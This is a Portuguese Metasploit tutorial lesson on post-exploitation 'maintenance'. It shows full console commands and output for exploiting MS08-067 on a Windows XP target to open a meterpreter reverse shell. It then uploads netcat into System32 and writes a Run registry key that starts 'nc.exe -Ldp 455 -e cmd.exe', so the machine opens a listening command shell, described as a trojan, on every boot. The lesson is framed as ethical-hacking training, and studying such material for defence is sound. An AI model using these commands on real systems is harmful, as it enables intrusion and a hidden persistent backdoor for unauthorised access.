Manutenção

Nessa parte do mini curso Metasploit, mostraremos como plantar um cavalo de tróia e garantir o retorno. Essa fase do ataque também é conhecida como manutenção:

1º) Passo: Ganhar acesso ao alvo

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.107
RHOST => 192.168.1.107
msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.110:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.110:4444 -> 192.168.1.107:1118) at 2012-08-20 17:15:06 -0300

2º)Passo: já no meterpreter vamos fazer o upload do NETCAT para a máquina alvo, isto nos garantirá uma porta na escuta para futuros retornos.

meterpreter > lcd /pentest/windows-binaries/tools
meterpreter > upload nc.exe C:\\Windows\\System32
[*] uploading  : nc.exe -> C:\Windows\System32
[*] uploaded   : nc.exe -> C:\Windows\System32\nc.exe

3º) Passo, após subir o NETCAT , vamos enumerar as entradas no registro

meterpreter > reg enumkey -k  HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  Values (2):

        VMware Tools
        VMware User Process

4º) Passo: feito isso, vamos então plantar o NETCAT

meterpreter > reg setval -k  HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v -nc -d 'C:\WINDOWS\System32\nc.exe -Ldp 455 -e cmd.exe'
Successful set -nc.

5º) Passo: vamos enumerar novamente e verificar se tivemos sucesso

meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  Values (3):

        VMware Tools
        VMware User Process
        -nc

6°)Passo: Note que agora temos o valor -nc , então executemos o valor

meterpreter > reg queryval  -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v -nc
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Name: -nc
Type: REG_SZ
Data: C:\WINDOWS\System32\nc.exe -Ldp 455 -e cmd.exe

Ok !!! agora toda a vez que o alvo iniciar a máquina, nosso cavalo de tróia abrirá uma porta de conexão e poderemos acessar a máquina sem problemas.

Até o próximo módulo.

Autor: Sílvio César Roxo Giavaroto

É MBA Especialista em Gestão de Segurança da Informação, Tecnólogo em Redes de Computadores, C|EH Certified Ethical Hacker, atua como Pentest e Analista de Segurança em Servidores Linux no Governo do Estado de São Paulo, Professor Universitário , Instrutor C|EH e C|HFI.